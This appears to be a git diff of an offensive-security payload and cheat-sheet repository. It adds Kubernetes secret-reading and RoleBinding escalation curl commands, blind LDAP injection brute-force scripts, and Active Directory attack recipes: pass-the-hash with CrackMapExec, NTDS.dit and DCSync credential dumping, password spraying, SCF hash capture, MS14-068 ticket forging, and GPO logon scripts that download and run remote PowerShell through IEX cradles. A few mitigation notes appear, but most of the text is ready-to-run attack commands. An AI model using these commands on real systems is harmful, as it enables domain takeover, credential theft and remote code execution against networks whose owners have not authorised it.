+        "name": "admin"
+    },
+    "subjects": [
+        {
+            "kind": "ServiceAccount",
+            "name": "sa-comp"
+            "namespace": "default"
+        }
+    ]
+}
+```
+
+```powershell
+curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
+curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
+```
+
+### Impersonating a Privileged Account
+
+```powershell
+curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
+```
+
+## Privileged Service Account Token
+
+```powershell
+$ cat /run/secrets/kubernetes.io/serviceaccount/token
+$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
+```
+
+## Interesting endpoints to reach
+
+```powershell
+# List Pods
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
+
+# List secrets
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
+
+# List deployments
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
+
+# List daemonsets
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
+```
+
+
+## API addresses that you should know 
+
+*(External network visibility)*
+
+### cAdvisor
+
+```powershell
+curl -k https://<IP Address>:4194
+```
+
+### Insecure API server
+
+```powershell
+curl -k https://<IP Address>:8080
+```
+
+### Secure API Server
+
+```powershell
+curl -k https://<IP Address>:(8|6)443/swaggerapi
+curl -k https://<IP Address>:(8|6)443/healthz
+curl -k https://<IP Address>:(8|6)443/api/v1
+```
+
+### etcd API
+
+```powershell
+curl -k https://<IP address>:2379
+curl -k https://<IP address>:2379/version
+etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
+```
+
+### Kubelet API
+
+```powershell
+curl -k https://<IP address>:10250
+curl -k https://<IP address>:10250/metrics
+curl -k https://<IP address>:10250/pods
+```
+
+### kubelet (Read only)
+
+```powershell
+curl -k https://<IP Address>:10255
+http://<external-IP>:10255/pods
+```
+
+
+## References
+
+- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1)
+- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2)
+- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
\ No newline at end of file
diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md
index ab770777..45c92db2 100644
--- a/LDAP Injection/README.md	
+++ b/LDAP Injection/README.md	
@@ -96,9 +96,92 @@ userPassword:2.5.13.18:=\xx\xx
 userPassword:2.5.13.18:=\xx\xx\xx
 ```
 
+## Scripts
+
+### Discover valid LDAP fields
+
+```python
+#!/usr/bin/python3
+
+import requests
+import string
+
+fields = []
+
+url = 'https://URL.com/'
+
+f = open('dic', 'r') #Open the wordlists of common attributes
+wordl = f.read().split('\n')
+f.close()
+
+for i in wordl:
+    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
+    if 'TRUE CONDITION' in r.text:
+        fields.append(str(i))
+
+print(fields)
+```
+
+Ref. [5][5]
+
+### Special Blind LDAP Injection (without "*")
+
+```python
+#!/usr/bin/python3
+
+import requests, string
+alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
+
+flag = ""
+for i in range(50):
+    print("[i] Looking for number " + str(i))
+    for char in alphabet:
+        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
+        if ("TRUE CONDITION" in r.text):
+            flag += char
+            print("[+] Flag: " + flag)
+            break
+```
+
+Ref. [5][5]
+
+```ruby
+#!/usr/bin/env ruby
+
+require 'net/http'
+alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
+
+flag = ''
+
+(0..50).each do |i|
+  puts("[i] Looking for number #{i}")
+  alphabet.each do |char|
+    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
+    if /TRUE CONDITION/.match?(r)
+      flag += char
+      puts("[+] Flag: #{flag}")
+      break
+    end
+  end
+end
+```
+
+By [noraj](https://github.com/noraj)
+
+## Google Dorks
+
+```
+intitle:"phpLDAPadmin" inurl:cmd.php
+```
+
+Ref. [5][5]
+
 ## References
 
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
-* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
\ No newline at end of file
+* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
+* \[5] [LDAP Injection - HackTricks][5]
+
+[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index d0473678..ce4d6d8f 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -2,26 +2,65 @@
 
 ## Summary
 
-* [Tools](#tools)
-* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
-  * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
-  * [Open Shares](#open-shares)
-  * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
-  * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
-  * [Password in AD User comment](#password-in-ad-user-comment)
-  * [Golden Tickets](#passtheticket-golden-tickets)
-  * [Silver Tickets](#passtheticket-silver-tickets)
-  * [Trust Tickets](#trust-tickets)
-  * [Kerberoast](#kerberoast)
-  * [KRB_AS_REP roasting](#krb_as_rep-roasting)
-  * [Pass-the-Hash](#pass-the-hash)
-  * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
-  * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
-  * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
-  * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
-  * [Trust relationship between domains](#trust-relationship-between-domains)
-  * [PrivExchange attack](#privexchange-attack)
-  * [Password spraying](#password-spraying)
+- [Active Directory Attacks](#active-directory-attacks)
+  - [Summary](#summary)
+  - [Tools](#tools)
+  - [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
+    - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
+    - [Open Shares](#open-shares)
+    - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
+    - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
+    - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
+    - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
+      - [Using ndtsutil](#using-ndtsutil)
+      - [Using Vshadow](#using-vshadow)
+      - [Using vssadmin](#using-vssadmin)
+      - [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
+      - [Using esentutl.exe](#using-esentutlexe)
+      - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
+      - [Alternatives - modules](#alternatives---modules)
+      - [Using Mimikatz DCSync](#using-mimikatz-dcsync)
+      - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
+    - [Password spraying](#password-spraying)
+      - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
+      - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list)
+      - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
+    - [Password in AD User comment](#password-in-ad-user-comment)
+    - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
+      - [Using Mimikatz](#using-mimikatz)
+      - [Using Meterpreter](#using-meterpreter)
+      - [Using a ticket on Linux](#using-a-ticket-on-linux)
+    - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
+    - [Kerberoasting](#kerberoasting)
+    - [KRB_AS_REP Roasting](#krbasrep-roasting)
+    - [Pass-the-Hash](#pass-the-hash)
+    - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
+      - [Using impacket](#using-impacket)
+      - [Using Rubeus](#using-rubeus)
+    - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
+    - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
+      - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
+      - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
+      - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
+      - [Drop the MIC](#drop-the-mic)
+      - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
+    - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+    - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
+    - [Trust relationship between domains](#trust-relationship-between-domains)
+    - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
+    - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
+    - [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
+    - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
+    - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
+    - [PrivExchange attack](#privexchange-attack)
+    - [PXE Boot image attack](#pxe-boot-image-attack)
+    - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
+  - [Linux Active Directory](#linux-active-directory)
+    - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp)
+    - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring)
+    - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab)
+    - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
+  - [References](#references)
 
 ## Tools
 
@@ -38,6 +77,9 @@
   ./bloodhound
   SharpHound.exe (from resources/Ingestor)
   SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
+  SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
+  SharpHound.exe -c all -d active.htb -SearchForest
+  SharpHound.exe --EncryptZip --ZipFilename export.zip
   or 
   Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
   or 
@@ -48,15 +90,18 @@
 * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
 
   ```bash
+  apt-get install -y libssl-dev libffi-dev python-dev build-essential
   git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
   crackmapexec smb -L
   crackmapexec smb -M name_module -o VAR=DATA
-  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
-  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
-  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
-  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
-  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
-  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
+  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
+  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
+  crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
+  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
+  crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
+  crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
+  crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
+  crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
   crackmapexec mimikatz --server http --server-port 80
   ```
 
@@ -70,6 +115,7 @@
   # -wh: Server hosting WPAD file (Attacker’s IP)
   # -t: Target (You cannot relay credentials to the same device that you’re spoofing)
   # -i: open an interactive shell
+  ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
   ```
 
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
@@ -79,6 +125,12 @@
   powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
   ```
 
+* [ADRecon](https://github.com/sense-of-security/ADRecon)
+
+  ```powershell
+  .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
+  ```
+
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
 
     ```powershell
@@ -89,6 +141,10 @@
 
     ```powershell
     pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
+    pingcastle.exe --healthcheck --server domain.local
+    pingcastle.exe --graph --server domain.local
+    pingcastle.exe --scanner scanner_name --server domain.local
+    available scanners are:aclcheck,antivirus,corruptADDatabase,foreignusers,laps_bitlocker,localadmin,ullsession,nullsession-trust,share,smb,spooler,startup
     ```
 
 * [Kerbrute](https://github.com/ropnop/kerbrute)
@@ -97,33 +153,121 @@
     ./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
     ```
 
+* [Rubeus](https://github.com/GhostPack/Rubeus)
+
+    ```powershell
+    Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid]
+    Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID]
+    Rubeus.exe klist [/luid:LOGINID]
+    Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
+    ```
+
+* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab)
+    ```powershell
+    New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV
+    Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD'
+    Install-Lab
+    Show-LabDeploymentSummary
+    ```
+
 ## Most common paths to AD compromise
 
 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
 
-```bash
-Exploit Python: https://www.exploit-db.com/exploits/35474/
-Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
-Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
+This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
 
-git clone https://github.com/bidord/pykek
-python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
-python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
+```powershell
+# remote
+rpcclient $> lookupnames john.smith
+john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
+
+# loc
+wmic useraccount get name,sid
+Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
+Guest          S-1-5-21-3415849876-833628785-5197346142-501   
+Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
+Guest          S-1-5-21-297520375-2634728305-5197346142-501   
+krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
+lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
+
+# powerview
+Convert-NameToSid high-sec-corp.localkrbtgt
+S-1-5-21-2941561648-383941485-1389968811-502
+```
+
+```bash
+Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
+```
+
+Generate a ticket with `metasploit` or `pykek`
+
+```powershell
+Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
+   Name      Current Setting                                Required  Description
+   ----      ---------------                                --------  -----------
+   DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
+   PASSWORD  P@ssw0rd                                       yes       The Domain User password
+   RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
+   RPORT     88                                             yes       The target port
+   Timeout   10                                             yes       The TCP timeout to establish connection and read data
+   USER      lambda                                         yes       The Domain User
+   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
+```
+
+```powershell
+# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
+$ git clone https://github.com/SecWiki/windows-kernel-exploits
+$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
+$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
+$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
+$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
+-1105
+  [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
+  [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
+  [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
+  [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
+  [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
+  [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
+  [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
+  [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
+  [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
+```
+
+Then use `mimikatz` to load the ticket.
+
+```powershell
 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```
 
+:warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
+
+```powershell
+Linux> $ nmap -sV -sC 10.10.10.10
+clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
+
+Linux> sudo date -s "14 APR 2015 18:25:16" 
+Windows> net time /domain /set
+```
+
+#### Mitigations
+
+* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
+
+
 ### Open Shares
 
 ```powershell
-smbmap -H 10.10.10.100    # null session
-smbmap -H 10.10.10.100 -R # recursive listing
-smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
+smbmap -H 10.10.10.10                # null session
+smbmap -H 10.10.10.10 -R             # recursive listing
+smbmap -H 10.10.10.10 -u invaliduser # guest smb session
+smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
 ```
 
 or 
 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
+pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
 ls  # list files
 cd  # move inside a folder
 get # download files
@@ -151,6 +295,7 @@ ls            # list files
 Download a folder recursively
 
 ```powershell
+smbclient -U username //10.0.0.1/SYSVOL
 smbclient //10.0.0.1/Share
 smb: \> mask ""
 smb: \> recurse ON
@@ -163,13 +308,37 @@ Mount a share
 
 ```powershell
 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
+sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
 ```
 
-### GPO - Pivoting with Local Admin & Passwords in SYSVOL
+### SCF and URL file attack against writeable share
+
+Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
+
+```powershell
+[Shell]
+Command=2
+IconFile=\\10.10.XX.XX\Share\test.ico
+[Taskbar]
+Command=ToggleDesktop
+```
+
+This attack also works with `.url` files and `responder -I eth0 -v`.
+
+```powershell
+[InternetShortcut]
+URL=whatever
+WorkingDirectory=whatever
+IconFile=\\192.168.1.29\%USERNAME%.icon
+IconIndex=1
+```
+
+
+### Passwords in SYSVOL & Group Policy Preferences
 
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
 
-Find password in SYSVOL (MS14-025)
+Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
 
 ```powershell
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
@@ -186,20 +355,22 @@ echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d
 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 ```
 
-Metasploit modules to enumerate shares and credentials
+#### Automate the SYSVOL and passwords research
 
-```c
-scanner/smb/smb_enumshares
-post/windows/gather/enum_shares
-post/windows/gather/credentials/gpp
-```
+* Metasploit modules to enumerate shares and credentials
 
-Crackmapexec modules
+    ```c
+    scanner/smb/smb_enumshares
+    post/windows/gather/enum_shares
+    post/windows/gather/credentials/gpp
+    ```
 
-```powershell
-cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
-cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
-```
+* Crackmapexec modules
+
+    ```powershell
+    cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
+    cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
+    ```
 
 List all GPO for a domain
 
@@ -212,7 +383,34 @@ Get-NetGPO
 Get-NetGPOGroup
 ```
 
-### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
+#### Mitigations
+
+* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
+* Delete existing GPP xml files in SYSVOL containing passwords.
+* Don’t put passwords in files that are accessible by all authenticated users.
+
+### Exploit Group Policy Objects GPO
+
+```powershell
+# Adding User Rights
+SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
+
+# Adding a Local Admin
+SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
+
+# Configuring a User or Computer Logon Script
+SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
+
+# Configuring a Computer or User Immediate Task
+SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
+```
+
+
+### Dumping AD Domain Credentials
+
+You will need the following files to extract the ntds : 
+- ntds file (C:\Windows\NTDS\ntds.dit)
+- SYSTEM hive (C:\Windows\System32\SYSTEM)
 
 #### Using ndtsutil
 
@@ -273,9 +471,17 @@ dir c:\exfil
 reg.exe save hklm\system c:\exfil\system.bak
 ```
 
+#### Using esentutl.exe
+
+Copy/extract a locked file such as the AD Database
+
+```powershell
+esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
+```
+
 #### Extract hashes from ntds.dit
 
-then you need to use secretsdump to extract the hashes
+then you need to use secretsdump to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit
 
 ```java
 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
@@ -284,10 +490,13 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
 secretsdump also works remotely
 
 ```java
-./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
+./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status 
 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
 ```
 
+* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
+* `-user-status`: Display whether or not the user is disabled.
+
 #### Alternatives - modules
 
 Metasploit modules
@@ -306,6 +515,78 @@ CrackMapExec module
 
 ```powershell
 cme smb 10.10.0.202 -u username -p password --ntds vss
+cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
+```
+
+#### Using Mimikatz DCSync
+
+Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. 
+
+```powershell
+mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
+```
+
+:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
+
+#### Using Mimikatz sekurlsa
+
+Dumps credential data in an Active Directory domain when run on a Domain Controller.
+:warning: Requires administrator access with debug or Local SYSTEM rights
+
+```powershell
+sekurlsa::krbtgt
+lsadump::lsa /inject /name:krbtgt
+```
+
+
+### Password spraying
+
+Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
+
+> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 
+
+Most of the time the best passwords to spray are :
+
+- P@ssw0rd01, Password123, mimikatz
+- Welcome1/Welcome01
+- $Companyname1 : $Microsoft1
+- SeasonYear : Winter2019*,Spring2020!,Summer2018? 
+- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
+
+#### Kerberos pre-auth bruteforcing
+
+Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
+
+> Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
+
+```powershell
+root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
+root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
+root@kali:~$ python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
+```
+
+#### Spray a pre-generated passwords list
+
+Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
+
+```powershell
+crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
+```
+
+#### Spray passwords against the RDP service
+
+Using RDPassSpray to target RDP services.
+
+```powershell
+git clone https://github.com/xFreed0m/RDPassSpray
+python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
+```
+
+Using hydra and ncrack to target RDP services.
+
+```powershell
+hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
+ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
 ```
 
 ### Password in AD User comment
@@ -317,32 +598,39 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 
 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
-
-### PassTheTicket Golden Tickets
-
-Forging a TGT require the krbtgt key
-
-Mimikatz version
+or dump the Active Directory and `grep` the content.
 
 ```powershell
-Get info - Mimikatz
+ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
+```
+
+### Pass-the-Ticket Golden Tickets
+
